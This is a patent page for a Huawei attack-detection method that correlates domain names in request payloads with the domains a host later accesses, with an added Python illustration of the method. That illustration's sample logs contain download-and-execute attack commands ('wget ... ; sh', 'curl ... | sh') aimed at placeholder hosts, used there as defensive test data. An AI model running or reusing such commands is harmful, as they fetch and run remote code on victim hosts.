CN117061139A - Attack detection method and device - Google Patents


Info

Publication number: CN117061139A
Authority: CN (China)
Prior art keywords: host, domain name, log, request message, detection device
Prior art date:
Legal status: Pending
Application number: CN202210493521.XA
Other languages: Chinese (zh)
Inventors: 杨浩鹏, 王飞跃, 李强
Current Assignee: Huawei Technologies Co Ltd
Original Assignee: Huawei Technologies Co Ltd
Priority date:
Filing date:
Publication date:
Application filed by Huawei Technologies Co Ltd
Priority to CN202210493521.XA
Priority to PCT/CN2023/087493 (WO2023216792A1)
Publication of CN117061139A

Classifications

    • H ELECTRICITY
    • H04 ELECTRIC COMMUNICATION TECHNIQUE
    • H04L TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00 Network architectures or network communication protocols for network security
    • H04L63/14 Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1408 Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
    • H04L63/1416 Event detection, e.g. attack signature detection
    • H04L63/1425 Traffic logging, e.g. anomaly detection
    • H04L63/1433 Vulnerability analysis
    • H04L43/00 Arrangements for monitoring or testing data switching networks
    • H04L43/04 Processing captured monitoring data, e.g. for logfile generation
    • H04L9/00 Cryptographic mechanisms or cryptographic arrangements for secret or secure communications; Network security protocols
    • H04L9/40 Network security protocols

Abstract

Embodiments of this application disclose an attack detection method. A detection device obtains a network log of a host and a host log of the host. The network log includes parameter information of a first request message, where the first request message is a request message that the host received from another device, and the parameter information includes a first domain name carried in the payload of the first request message. The host log includes at least one domain name accessed by the host. The detection device matches the first domain name against the at least one domain name. If the at least one domain name includes the first domain name, the detection device generates alarm information indicating that the host has been attacked. By combining the first domain name carried in the first request message with the domain names the host actually accessed, the method determines whether an attack on the host succeeded and generates alarm information only when the attack was executed successfully, so that attacks on the host are detected accurately without a large number of false alarms.

Description

Attack detection method and device
Technical Field
This application relates to the field of information security, and in particular to a method and apparatus for detecting an attack.
Background
An attacker usually intrudes into a host by exploiting a vulnerability. Some vulnerabilities allow the attacker to execute system commands directly on the host; such vulnerabilities are comparatively high-risk and are widely exploited. They include, for example, remote command execution (RCE) vulnerabilities. In the conventional approach to this attack behaviour, an analyst studies the characteristics of a vulnerability by hand, writes a corresponding detection rule, and configures the rule on a security device such as a firewall. The security device performs feature matching on the traffic passing through it according to the detection rules and, if the traffic matches, generates an alarm indicating that an attack event has occurred.
The conventional approach often has low accuracy. How to accurately detect attacks that an attacker launches by exploiting vulnerabilities is a problem that remains to be solved.
Disclosure of Invention
Embodiments of this application provide a method and apparatus for detecting an attack, which can accurately detect attacks launched by exploiting a specific class of vulnerabilities.
In a first aspect, an embodiment of this application provides a method for detecting an attack, applied to a detection device. In one example, the detection device obtains a network log of a host and a host log of the host. The network log includes parameter information of a first request message, where the first request message is a request message that the host received from another device, and the parameter information includes a first domain name carried in the payload of the first request message. The host log includes at least one domain name accessed by the host. After obtaining the two logs, the detection device matches the first domain name from the network log against the at least one domain name in the host log. If the at least one domain name in the host log includes the first domain name, two facts are established: the host received a first request message carrying the first domain name, and the host accessed the first domain name. In this case the host is considered to have accessed the first domain name because of the first request message. In other words, the host has a vulnerability that the attacker attempted to exploit through the first request message (a vulnerability that allows the attacker to execute system commands directly on the host), and the attack launched against that vulnerability was executed successfully. The detection device therefore generates alarm information indicating that the host has been attacked. The solution thus combines the first domain name carried in the first request message with the at least one domain name accessed by the host to determine whether the attack on the host succeeded, and generates alarm information only when the attack was executed successfully.
Correspondingly, if the at least one domain name in the host log does not include the first domain name from the network log, the attacker attempted to launch an attack through the vulnerability but did not execute it successfully, and no alarm is generated in this case. The solution therefore detects attacks on the host accurately and avoids generating a large number of false alarms.
In one possible implementation, the parameter information of the first request message further includes the time at which the host received the first request message, and the host log further includes a time corresponding to each domain name in the at least one domain name, where the time corresponding to a second domain name in the host log is the time at which the host accessed the second domain name, the at least one domain name including the second domain name. In this case the detection device can determine more information about the first request message from the network log, and can determine from the host log when the host accessed each of the at least one domain name.
In one possible implementation, to improve detection accuracy, when the network log received by the detection device includes the time at which the host received the first request message and the host log includes the time corresponding to each of the at least one domain name, the detection device, in addition to matching the first domain name against the at least one domain name, further determines whether the time corresponding to the first domain name in the host log is later than the time at which the host received the first request message. If it is, the host received the first request message first and then accessed the first domain name; the host is then confirmed to have been attacked, and specifically it is determined that the attacker attacked the host using the first request message. In this case the detection device generates the aforementioned alarm information indicating that the host has been attacked.
In one possible implementation, it is taken into account that for an attack message there is a certain delay between the moment the host receives the attack message and the moment the host accesses the domain name carried in it, and that this delay generally falls within a bounded range. Therefore, in one example, after determining that the at least one domain name includes the first domain name and that the time corresponding to the first domain name in the host log is later than the time at which the host received the first request message, the detection device further determines whether the difference between the two times is less than or equal to a preset time threshold. When the difference is less than or equal to the preset time threshold, it is determined that the host has been attacked, and specifically that the attacker attacked the host using the first request message. In this case the detection device generates the aforementioned alarm information indicating that the host has been attacked.
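One way to implement the correlation described in the first aspect, as an added example that is not code from the patent or from Huawei: it matches domain names found in the payload of received requests against domain names the host accessed, applies the ordering check and the preset time threshold, and builds alarm records carrying the payload, destination IP, host IP and host log record. The record shapes, the regular-expression extraction of host names from http(s) URLs, the 60-second threshold, the sample domains and the documentation-range IP addresses are all assumptions made for the example; the host log is modelled as command lines captured from a shell-execution hook, which is one of the collection methods the patent mentions.

```python
"""Correlate request payload domains with the domains the host then accessed.

Added illustration, not code from the patent. Assumed record shapes: the
network log holds each request the host received (receive time, source and
destination IP, raw payload); the host log holds each command line the host's
shell executed (time, host IP, command), as a shell-execution hook would emit.
"""
import re
from dataclasses import dataclass
from datetime import datetime, timedelta

# Host part of an http(s) URL: dot-separated labels, port and path excluded.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]*[A-Za-z0-9])?"
_URL_HOST = re.compile(r"https?://(" + _LABEL + r"(?:\." + _LABEL + r")+)")


def extract_domains(text: str) -> set[str]:
    """Lower-cased host name of every http(s) URL found in text."""
    return {m.group(1).lower() for m in _URL_HOST.finditer(text)}


@dataclass(frozen=True)
class NetRecord:            # one network-log entry
    recv_time: datetime
    src_ip: str
    dst_ip: str
    payload: str


@dataclass(frozen=True)
class HostRecord:           # one host-log entry
    access_time: datetime
    host_ip: str
    command: str            # command line captured by the shell hook


def detect(net_log, host_log, threshold=timedelta(seconds=60)):
    """One alert per (request, domain) the host acted on: the host log must
    show an access to that domain after the request arrived and within
    `threshold`. A request whose domain the host never contacted (a failed
    exploit attempt) yields nothing, unlike signature-only matching."""
    by_domain = {}                       # domain -> host-log records
    for h in host_log:
        for d in extract_domains(h.command):
            by_domain.setdefault(d, []).append(h)
    alerts = []
    for n in net_log:
        for d in sorted(extract_domains(n.payload)):
            for h in by_domain.get(d, []):
                delay = h.access_time - n.recv_time
                if timedelta(0) < delay <= threshold:   # after, and close enough
                    alerts.append({
                        "host_ip": h.host_ip, "dst_ip": n.dst_ip,
                        "src_ip": n.src_ip, "domain": d,
                        "payload": n.payload, "host_record": h.command,
                        "recv_time": n.recv_time.isoformat(),
                        "access_time": h.access_time.isoformat(),
                        "delay_s": delay.total_seconds()})
                    break                # one alert per request and domain
    return alerts


def sample_logs():
    """Constructed sample data (not from the patent): documentation-range
    IP addresses and made-up domain names."""
    t0, host = datetime(2023, 5, 9, 10, 0, 0), "192.0.2.10"
    body = "POST /api/exec HTTP/1.1\r\n\r\ncmd="
    net_log = [
        # 1: injected command that the host ran two seconds later -> alert
        NetRecord(t0, "203.0.113.7", host,
                  body + "wget http://dl.evil-example.test/x.sh -O /tmp/x; sh /tmp/x"),
        # 2: same kind of attempt, but the host never fetched the domain -> no alert
        NetRecord(t0 + timedelta(minutes=5), "203.0.113.7", host,
                  body + "curl http://second.evil-example.test/p.sh | sh"),
        # 3: domain the host had contacted BEFORE the request -> no alert
        NetRecord(t0 + timedelta(minutes=10), "203.0.113.8", host,
                  "GET /?u=http://mirror.example.test/pkg HTTP/1.1"),
        # 4: host contacted the domain, but five minutes later (> threshold) -> no alert
        NetRecord(t0 + timedelta(minutes=15), "203.0.113.9", host,
                  body + "wget http://late.evil-example.test/z"),
    ]
    host_log = [
        HostRecord(t0 + timedelta(seconds=2), host,
                   "sh -c 'wget http://dl.evil-example.test/x.sh -O /tmp/x; sh /tmp/x'"),
        HostRecord(t0 + timedelta(minutes=9), host, "curl http://mirror.example.test/pkg"),
        HostRecord(t0 + timedelta(minutes=20), host, "wget http://late.evil-example.test/z"),
    ]
    return net_log, host_log


def run_sample(threshold_s=60):
    """Run the detector over the constructed logs with a threshold in seconds."""
    net_log, host_log = sample_logs()
    return detect(net_log, host_log, timedelta(seconds=threshold_s))


if __name__ == "__main__":
    for a in run_sample():
        print(f"ALERT host={a['host_ip']} domain={a['domain']} delay={a['delay_s']}s")
```

With the 60-second threshold only request 1 produces an alarm; request 2 is the unsuccessful attempt that a signature-only firewall would still flag, request 3 shows why the ordering check matters (a routine fetch that merely happens to share a domain with a later request), and request 4 shows the threshold dropping an access too far removed to be attributed to the request. Raising the threshold to ten minutes brings request 4 back in, which is the trade-off the preset threshold controls. A practitioner should note that the extractor only recognises plain http(s) URLs; payloads that carry an IP literal, an encoded string or a DNS-only beacon need a richer extractor and a host log that also records name resolutions.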
In one possible implementation, the detection device is integrated in the host. In this case, the detection device obtaining the network log of the host means that the host obtains its own network log; in one example, the host does so by hooking a network function. Correspondingly, the detection device obtaining the host log of the host means that the host obtains its own host log; in one example, the host does so by hooking the shell execution process of the operating system.
In one possible implementation, the detection device is a separate computer device connected to the host over a network. In this case, the detection device obtains the network log of the host by receiving the network log sent by a security device deployed between the other device and the host, and obtains the host log of the host by receiving the host log sent by the host.
In one possible implementation, when the detection device is a separate computer device connected to the host over a network, the detection device, the security device and the host are located in the same local area network. In this case the host and the security device can access the detection device, while devices outside the local area network cannot.
In one possible implementation, the detection device is deployed on the internet. In this case the host and the security device, as well as other devices, can access the detection device.
In one possible implementation, after generating the alarm information, the detection device further outputs it, so that operation and maintenance personnel or another device (such as a management device) can learn that the host has been attacked and take corresponding measures.
In one possible implementation, so that operation and maintenance personnel or the management device can learn more about the attack message, the alarm information further includes additional information about the first request message. As an example, if the parameter information of the first request message in the network log obtained by the detection device further includes the payload of the first request message and/or its destination IP address, the alarm information correspondingly includes that payload and/or destination IP address. In yet another example, the host log obtained by the detection device further includes the IP address of the host and/or a log record corresponding to each domain name in the at least one domain name; in this case the alarm information further includes the IP address of the host and/or the log record corresponding to the first domain name from the host log.
In one possible implementation, the first request message is a transmission control protocol (TCP) based request message. In this situation, the solution can accurately determine whether an attack on the host using a TCP request message succeeded, and generates alarm information only when the attack was executed successfully.
In a second aspect, an embodiment of this application provides a system for detecting an attack. The system includes a security device, a host and a detection device. The security device is configured to send a network log of the host to the detection device, where the network log includes parameter information of a first request message, the first request message is a message that the host received from another device, and the parameter information includes a first domain name carried in the payload of the first request message. The host is configured to send a host log of the host to the detection device, where the host log includes at least one domain name accessed by the host. The detection device is configured to receive the network log sent by the security device and the host log sent by the host, and to generate alarm information when the at least one domain name includes the first domain name, the alarm information indicating that the host has been attacked. The solution combines the first domain name carried in the first request message with the at least one domain name accessed by the host to determine whether the attack on the host succeeded, and generates alarm information only when the attack was executed successfully. Correspondingly, if the at least one domain name in the host log does not include the first domain name from the network log, the attacker attempted to launch an attack through the vulnerability but did not execute it successfully, and no alarm is generated. The solution therefore detects attacks on the host accurately and avoids generating a large number of false alarms.
In a possible implementation, the parameter information further includes the time at which the host received the first request message, and the host log further includes a time corresponding to each domain name in the at least one domain name, where the time corresponding to a second domain name in the host log is the time at which the host accessed the second domain name, the at least one domain name including the second domain name.
In one possible implementation, the detection device is configured to generate the alarm information when the at least one domain name includes the first domain name and the time corresponding to the first domain name in the host log is later than the time at which the host received the first request message.
In one possible implementation, the detection device is configured to generate the alarm information when the at least one domain name includes the first domain name, the time corresponding to the first domain name in the host log is later than the time at which the host received the first request message, and the difference between the two times is less than or equal to a preset time threshold.
In one possible implementation, the host obtains its host log by hooking the shell execution process of the operating system.
In one possible implementation, the detection device, the security device, and the host are located within the same local area network.
In one possible implementation, the detection device is deployed on the internet.
In a possible implementation, the detection device is further configured to output the alarm information.
In a possible implementation, the parameter information further includes the payload and/or a destination IP address of the first request message, and the alarm information includes the payload and/or the destination IP address of the first request message from the parameter information.
In a possible implementation, the host log further includes the IP address of the host and/or a log record corresponding to each domain name in the at least one domain name, and the alarm information includes the IP address of the host and/or the log record corresponding to the first domain name from the host log.
In one possible implementation, the first request message is a TCP-based request message.
In a third aspect, an embodiment of this application provides a detection apparatus integrated in a host. The detection apparatus includes an obtaining module and a processing module. The obtaining module is configured to obtain a network log of the host, where the network log includes parameter information of a first request message, the first request message is a request message that the host received from another device, and the parameter information includes a first domain name carried in the payload of the first request message. The obtaining module is further configured to obtain a host log of the host, where the host log includes at least one domain name accessed by the host. The processing module is configured to generate alarm information if the at least one domain name includes the first domain name, the alarm information indicating that the host has been attacked.
In one possible implementation, the obtaining module is configured to obtain the network log of the host by hooking a network function, and to obtain the host log of the host by hooking the shell execution process of the operating system.
In a fourth aspect, an embodiment of this application provides a detection apparatus applied to a detection device. The apparatus includes an obtaining module and a processing module. The obtaining module is configured to obtain a network log of a host, where the network log includes parameter information of a first request message, the first request message is a request message that the host received from another device, and the parameter information includes a first domain name carried in the payload of the first request message. The obtaining module is further configured to obtain a host log of the host, where the host log includes at least one domain name accessed by the host. The processing module is configured to generate alarm information if the at least one domain name includes the first domain name, the alarm information indicating that the host has been attacked.
In a possible implementation, the parameter information further includes the time at which the host received the first request message, and the host log further includes a time corresponding to each domain name in the at least one domain name, where the time corresponding to a second domain name in the host log is the time at which the host accessed the second domain name, the at least one domain name including the second domain name.
In one possible implementation, the processing module is configured to generate the alarm information if the at least one domain name includes the first domain name and the time corresponding to the first domain name in the host log is later than the time at which the host received the first request message.
In one possible implementation, the processing module is configured to generate the alarm information if the at least one domain name includes the first domain name, the time corresponding to the first domain name in the host log is later than the time at which the host received the first request message, and the difference between the two times is less than or equal to a preset time threshold.
In one possible implementation, the detection device is integrated in the host, and the obtaining module is configured to obtain the network log of the host by hooking a network function, and to obtain the host log of the host by hooking the shell execution process of the operating system.
In a possible implementation, the detection device is a separate computer device connected to the host over a network, and the obtaining module is configured to receive the network log sent by a security device deployed between the other device and the host, and to receive the host log sent by the host.
In one possible implementation, the detection device, the security device, and the host are located within the same local area network.
In one possible implementation, the detection device is deployed on the internet.
In one possible implementation, the processing module is further configured to output the alarm information.
In a possible implementation, the parameter information further includes the payload and/or a destination IP address of the first request message, and the alarm information further includes the payload and/or the destination IP address of the first request message from the parameter information.
In a possible implementation, the host log further includes the IP address of the host and/or a log record corresponding to each domain name in the at least one domain name, and the alarm information further includes the IP address of the host and/or the log record corresponding to the first domain name from the host log.
In a fifth aspect, an embodiment of the present application provides an apparatus. The apparatus includes a processor and a memory. The memory is used to store instructions or computer programs. The processor is configured to execute the instructions or computer program in the memory to perform the method of any one of the first aspect above.
In a sixth aspect, embodiments of the present application provide a computer readable storage medium comprising instructions or a computer program which, when run on a computer, causes the computer to perform the method of any one of the first aspects above.
In a seventh aspect, embodiments of the present application provide a computer program product comprising instructions or a computer program which, when run on a computer, cause the computer to perform the method of any of the first aspects above.
Drawings
To illustrate the embodiments of this application or the technical solutions in the prior art more clearly, the drawings used in the embodiments or in the description of the prior art are briefly described below. The drawings described below show only some of the embodiments of this application; a person skilled in the art could derive other drawings from them without inventive effort.
FIG. 1 is a schematic diagram of the process of launching an attack using a specific class of vulnerabilities in an exemplary application scenario;
FIG. 2a is a schematic diagram of an exemplary application scenario provided by an embodiment of this application;
FIG. 2b is a schematic diagram of another exemplary application scenario provided by an embodiment of this application;
FIG. 2c is a schematic diagram of yet another exemplary application scenario provided by an embodiment of this application;
FIG. 3 is a schematic flow chart of a method for detecting an attack according to an embodiment of this application;
FIG. 4 is a signalling interaction diagram of a method for detecting an attack according to an embodiment of this application;
FIG. 5 is a schematic structural diagram of a detection apparatus according to an embodiment of this application;
FIG. 6 is a schematic structural diagram of an apparatus according to an embodiment of this application.
Detailed Description
The embodiment of the application provides a method and a device for detecting attacks, which can improve the detection accuracy of the attacks initiated by utilizing specific types of vulnerabilities. Wherein the specific class of vulnerabilities includes vulnerabilities that allow an attacker to execute system commands directly on the host.
For easy understanding, the attack initiated by the specific type of vulnerability will be briefly described with reference to the accompanying drawings.
Referring to FIG. 1, a schematic diagram of a process for launching an attack using a specific class of vulnerabilities is shown. An attacker sends an attack message to the host containing an attack order, which in one example is downloading malware stored on domain name a to be executed locally to the host. Alternatively, the attack packet is a TCP request packet.
After the service with the vulnerability on the host receives the attack message, the vulnerability utilization is triggered, and after the vulnerability utilization is triggered, the service with the vulnerability calls a function in an operating system of the host to execute an attack command in the attack message. Further: the operating system sends an access request to domain name a and downloads the malware stored in some file directory of domain name a to the host locally and executes the malware on the host.
Aiming at the attack behavior shown in fig. 1, the conventional technology writes corresponding detection rules by manually analyzing the characteristics of the loopholes, and configures the detection rules in security devices such as a firewall. The security device performs feature matching on the flowing traffic based on the detection rules, and generates an alarm if the traffic is being matched, to indicate that an attack event has occurred. For example, in the scenario shown in fig. 1, the security device is disposed between an attacker and a host, and when the attacker sends the attack packet to the host, the security device performs feature matching on the attack packet. Alternatively, the security device is disposed between the host and the device corresponding to the domain name a, and when the host sends an access request to the domain name a, the security device performs feature matching on the access request. Similarly, when the host downloads malware from a file directory in domain name a, the security device performs feature matching on traffic that includes the malware.
However, on the one hand, since the detection rules are summarized based on the characteristics of the vulnerabilities, and the number and the types of the vulnerabilities are large, an analyst cannot analyze all the vulnerabilities one by one, and if an attacker initiates an attack by using the vulnerability which the analyst has not analyzed, the security device cannot detect the attack initiated by the attacker. Currently, the time from the discovery of the vulnerability to the attack by the attacker using the vulnerability is shorter and shorter, for example, more and more vulnerabilities are less than 1 day apart from the discovery to the attack by the attacker. This vulnerability is also known as a "zero-day vulnerability," also known as a zero-time difference attack, i.e., a security vulnerability that is exploited immediately after being discovered. Such attacks tend to be very bursty and damaging.
On the other hand, in some scenarios, although the host receives the attack packet, the host does not execute the attack order in the attack packet, namely: the attacker does not succeed in the attack. For this case, after the security device deployed between the attacker and the host performs feature matching on the flow flowing through based on the detection rule, an alarm is still generated due to the detection of the attack packet, so as to cause a false alarm.
In order to solve the above problems, the embodiment of the present application provides a method for detecting an attack, which can more accurately detect an attack initiated by an attacker on a host based on the specific type of vulnerability, and the scheme can also reduce false alarms.
Before introducing the method and system for detecting an attack provided by the embodiment of the present application, an application scenario of the method for detecting an attack provided by the embodiment of the present application is first described.
Referring to fig. 2a, a schematic diagram of an exemplary application scenario provided by an embodiment of the present application is shown. In the scenario shown in fig. 2a, the host 101 is connected to the network through other network devices, and an attack packet sent by an attacker is forwarded to the host 101 through other network devices (e.g., switches, routers, etc.). The host 101 is provided with a host agent (agent), the host agent is provided with a weblog acquisition module and a host log acquisition module, the host 101 acquires a weblog of the host by using the weblog acquisition module, acquires a host log of the host by using the host log acquisition module, and determines whether the host is attacked or not based on the weblog and the host log.
Wherein: the host agent is a component running on the host, in one example, a host intrusion detection system (host intrusion detection system, HIDS) agent, and in yet another example, a network intrusion detection system (network intrusion detection system, NIDS) agent.
Referring to fig. 2b, which is a schematic diagram of another exemplary application scenario provided by an embodiment of the present application, in the scenario shown in fig. 2b, a host 102 is connected to a network through a security device 103, and an attack packet sent by an attacker is forwarded to the host 102 through the security device 103. Optionally, there are also one or more network forwarding devices between the attacker and the security device, such as routers, security gateways, etc. The host 102 and the security device 103 also interact with the integrated analysis device 104.
The host 102 is provided with a host agent, the host agent is provided with a host log acquisition module, and the host 102 acquires a host log of the host 102 by using the host log acquisition module and sends the host log to the integrated analysis device 104. In addition, the security device 103 includes a weblog acquisition module, and the security device 103 acquires a weblog of the host 102 using the weblog acquisition module and transmits the weblog to the integrated analysis device 104. The integrated analysis device 104 determines whether the host is attacked based on the received weblog and the host log. Wherein: the host 102, the security device 103 and the integrated analysis device 104 are located within the same local area network. For this case, the integrated analysis device 104 is accessed by the host 102 and the security device 103 through the internet protocol (Internet Protocol, IP) address of the integrated analysis device 104, wherein the IP address of the integrated analysis device 104 is preconfigured on the host 102 and the security device 103. When the host 102, the security device 103, and the integrated analysis device 104 are located within the same local area network, other devices outside the local area network cannot access the integrated analysis device 104.
The protocol used for data interaction between the host 102 and the integrated analysis device 104 is not particularly limited by the present application. Protocols used for data interaction between the host 102 and the integrated analysis device 104 include, but are not limited to: TCP and hypertext transfer protocol (hyper text transfer protocol, HTTP). Similarly, protocols used for data interaction between the security device 103 and the integrated analysis device 104 include, but are not limited to: TCP and HTTP. Wherein the data interacted between the host 102 and the integrated analysis device 104 comprises the aforementioned host log, and the data interacted between the security device 103 and the integrated analysis device 104 comprises the aforementioned weblog.
The integrated analysis device 104 referred to herein is, for example, a device running extended detection and response (extended detection and response, XDR) software, and is, for example, a device running security information event management (security information event management, SIEM) software.
Referring to fig. 2c, which is a schematic diagram of still another exemplary application scenario provided by an embodiment of the present application, in the scenario shown in fig. 2c, a host 102 is connected to a network through a security device 103, and an attack packet sent by an attacker is forwarded to the host 102 through the security device 103. The host 102 and the security device 103 also interact with the cloud analysis device 105.
The host 102 is provided with a host agent, the host agent is provided with a host log obtaining module, and the host 102 obtains a host log of the host 102 by using the host log obtaining module and sends the host log to the cloud analysis device 105. In addition, the security device 103 includes a weblog obtaining module, and the security device 103 obtains a weblog of the host 102 by using the weblog obtaining module and sends the weblog to the cloud analysis device 105. Cloud analysis device 105 determines whether the host is attacked based on the received weblog and host log. Wherein:
the host 102 and the security device 103 are located in the same local area network, and the cloud analysis device 105 is deployed in the internet. For this case, the cloud analysis device 105 provides a subscription service that is accessed by any other device, such as the host 102 and the security device 103, through a uniform resource locator (uniform resource locator, URL), a web application programming interface (application programming interface, API), or a domain name.
The protocol used for data interaction between the host 102 and the cloud analysis device 105 is not particularly limited by the present application. Protocols used for data interaction between the host 102 and the cloud analysis device 105 include, but are not limited to: TCP, HTTP, and hypertext transfer protocol over secure sockets layer (hyper text transfer protocol over secure socket layer, HTTPS). Similarly, protocols used for data interaction between the security device 103 and the cloud analysis device 105 include, but are not limited to: TCP, HTTP, and HTTPS. Wherein the data interacted between the host 102 and the cloud analysis device 105 includes the aforementioned host log, and the data interacted between the security device 103 and the cloud analysis device 105 includes the aforementioned weblog.
Next, a method for detecting an attack provided by the application embodiment will be described with reference to fig. 3 and 4.
Referring to fig. 3, fig. 3 is a flow chart of an attack detection method according to an embodiment of the present application. Alternatively, the method of detecting an attack shown in fig. 3 is performed by a detection device.
When the method shown in fig. 3 is applied to the scenario shown in fig. 2a above, the detection device is the host 101 shown in fig. 2a; when the method shown in fig. 3 is applied to the scenario shown in fig. 2b above, the detection device is the integrated analysis device 104 shown in fig. 2b; and when the method shown in fig. 3 is applied to the scenario shown in fig. 2c above, the detection device is the cloud analysis device 105 shown in fig. 2c.
The method shown in fig. 3 comprises steps S101-S103.
S101: the method comprises the steps that detection equipment obtains a weblog of a host, wherein the weblog comprises parameter information of a first request message, the first request message is a request message received by the host from other equipment, and the parameter information comprises a first domain name included in a load part of the first request message.
When the method shown in fig. 3 is applied in the scenario shown in fig. 2a, the detection device is integrated in the host 101. For this case, the specific implementation manner of S101 is: the host 101 acquires its own weblog. In one example, the host 101 is able to obtain the weblog through a hook network function. In one example, a host monitors a protocol stack function library for a call to a network data processing function for processing messages received and transmitted by a network interface using a hook mechanism, and obtains a first request message processed by the network processing function when the network data processing function is called. Then, the host 101 analyzes the first request message, so as to obtain a load in the first request message, and further, analyzes the load to obtain a first domain name.
The embodiment of the present application is not particularly limited to a specific implementation manner in which the host 101 analyzes to obtain the load and the host 101 analyzes to obtain the first domain name from the load. In one example, when the first request message is a TCP request message, the host 101 parses the first request message using a message format specified in a request for comments (request for comments, RFC) 793, thereby obtaining a payload of the first request message. After obtaining the load of the first request packet, the host 101 uses regular expression to analyze and determine whether the domain name exists in the load according to the definition and constraint of the domain name in RFC1035, and extracts the first domain name included in the load when determining that the domain name exists in the load.
The embodiment of the application is not particularly limited to the other devices, and the other devices may be network devices or user devices, where the user devices include, but are not limited to, terminal devices and servers.
In the embodiment of the present application, the parameter information of the first request message refers to information about parameters related to the first request message, which is either extracted from the content of the first request message or obtained from context information when the first request message is received. The parameter information of the first request message may include other information besides the first domain name. In one example, the parameter information further includes the time at which the host receives the first request message. In yet another example, the parameter information further includes the payload portion of the first request message and/or the destination IP address of the first request message.
When the method shown in fig. 3 is applied to the scenario shown in fig. 2b or fig. 2c, the specific implementation of S101 is: the detection device receives the weblog sent by the security device 103, wherein the security device 103 is deployed between the other device and the host, that is, when the other device sends the first request message to the host 102, the first request message is forwarded through the security device 103. The security device 103 mentioned herein includes, but is not limited to, a device such as a firewall that is deployed with security policies.
In one example, after the security device 103 obtains the first request message, the security device obtains the parameter information of the first request message based on the first request message, and then sends the parameter information of the first request message to the detection device.
The specific implementation in which the detection device obtains the parameter information of the first request message based on the first request message is similar to the implementation in which the host 101 obtains the parameter information of the first request message based on the first request message, so reference may be made to the description of the host obtaining the parameter information of the first request message, which is not repeated here.
S102: the detection device obtains a host log of the host, wherein the host log comprises at least one domain name accessed by the host.
Optionally, in one example, the detection device obtains a host log of the host over a certain period of time, e.g., the detection device obtains the host log over a certain period of time after the host receives the first request message. The embodiment of the application does not particularly limit this period of time; to improve attack detection efficiency, the period is kept short. For example, the detection device obtains the host log within 10 seconds after the host receives the first request message.
When the method shown in fig. 3 is applied in the scenario shown in fig. 2a, the detection device is integrated with the host 101. For this case, the specific implementation of S102 is: the host 101 acquires its own host log. In one example, the host 101 obtains its own host log by hooking the shell execution process in the operating system. In one example, the host 101 monitors shell execution in the operating system using a hook mechanism to obtain its own shell execution log. Then, according to the definition and constraints of a domain name in RFC 1035, it uses regular expression analysis to determine whether a domain name exists in each shell execution log entry, and if so, stores the domain name, thereby obtaining a host log comprising at least one domain name accessed by the host.
In an embodiment of the present application, the host log includes information related to the host and domain names accessed by the host. In one example, the host log includes, in addition to the at least one domain name, a time of day corresponding to each of the at least one domain name. And for a second domain name in the at least one domain name, the time corresponding to the second domain name refers to the time when the host accesses the second domain name. In yet another example, the host log further includes a log record corresponding to an IP address of the host and/or each domain name of the at least one domain name, respectively.
When the method shown in fig. 3 is applied to the scenario shown in fig. 2b or fig. 2c, the specific implementation manner of S102 is: the host log sent by the host 102 is received. In one example, after receiving the first request message, the host 102 performs the step of obtaining a host log to obtain a host log of itself, and further sends the host log of itself to the detection device.
For a specific implementation of the host 102 obtaining the host log, reference may be made to the relevant description section of "the host 101 obtains its host log" in S101, which is not described in detail herein.
In addition, the embodiment of the present application is not particularly limited to the execution sequence between S101 and S102, S101 may be executed before S102, S101 may be executed between S102 and S103, and S101 may be executed simultaneously with S102.
S103: and if the at least one domain name comprises the first domain name, the detection equipment generates alarm information, wherein the alarm information is used for indicating that the host is attacked.
In other words, the alert information indicates that the attack performed by the first request message was successful.
After the detection device obtains the weblog and the host log, matching a first domain name in the weblog with at least one domain name in the host log, and if the at least one domain name in the host log comprises the first domain name, the detection device indicates that the host receives a first request message comprising the first domain name, and the host accesses the first domain name. For this case, the host is considered to have access to the first domain name in the first request message based on the first request message. Thus, for this case, the detection device determines that the host is attacked, and thus, the detection device generates alarm information indicating that the host is attacked. And for the case where at least one domain name in the host log does not include the first domain name in the weblog, it is explained that the attacker, although attempting to launch the attack with the vulnerability, does not perform successfully, in which case no alert is generated.
In one example, after the detection device generates the alert information, the alert information is further output to facilitate an operation and maintenance person or other device (e.g., management device) to determine that the host is attacked, thereby taking corresponding processing measures.
The embodiment of the application is not particularly limited to the specific implementation manner in which the detection device outputs the alarm information, in one example, the detection device displays the alarm information on a display screen, and in another example, the detection device sends the alarm information to other devices, such as a network management device.
In the embodiment of the application, in order to enable the operation and maintenance personnel or the management equipment to acquire more information related to the attack message, the alarm information also comprises more information related to the first request message.
As can be seen from the foregoing, in one example, the parameter information of the first request message included in the weblog further includes the payload portion of the first request message and/or the destination IP address of the first request message, and in this case the alarm information correspondingly also includes the payload portion and/or the destination IP address of the first request message included in the parameter information. For example, if the parameter information includes the payload portion, the alarm information includes the payload portion; for another example, if the parameter information includes the destination IP address of the first request message, the alarm information includes the destination IP address of the first request message. In yet another example, the host log further includes an IP address of the host and/or a log record corresponding to each domain name in the at least one domain name. For this case, the alarm information further includes the IP address of the host and/or the log record corresponding to the first domain name included in the host log. For example, if the host log includes the IP address of the host, the alarm information includes the IP address of the host; for another example, if the host log includes a log record corresponding to each domain name in the at least one domain name, the alarm information includes the log record corresponding to the first domain name.
As can be seen from the description of the weblog and the host log above: the weblog further includes a time when the host receives the first request message, and the host log further includes a time corresponding to each domain name in the at least one domain name. For this case, consider that for an attack message, the host receives the attack message at a time earlier than the time the host accesses the domain name included in the attack message.
Therefore, in order to further improve the accuracy of detecting the attack, in one example, in S103, in addition to matching the first domain name with the at least one domain name, if the at least one domain name includes the first domain name, the detection device further determines whether the time when the host receives the first request message is earlier than the time when the host accesses the first domain name, that is, the detection device further determines whether the time corresponding to the first domain name included in the host log is later than the time when the host receives the first request message. If the time corresponding to the first domain name in the host log is later than the time when the host receives the first request message, this indicates that the host first received the first request message and then accessed the first domain name; at this point it is confirmed that the host is attacked, and specifically, it is determined that an attacker used the first request message to attack the host. For this case, the detection device generates the aforementioned alarm information indicating that the host is attacked.
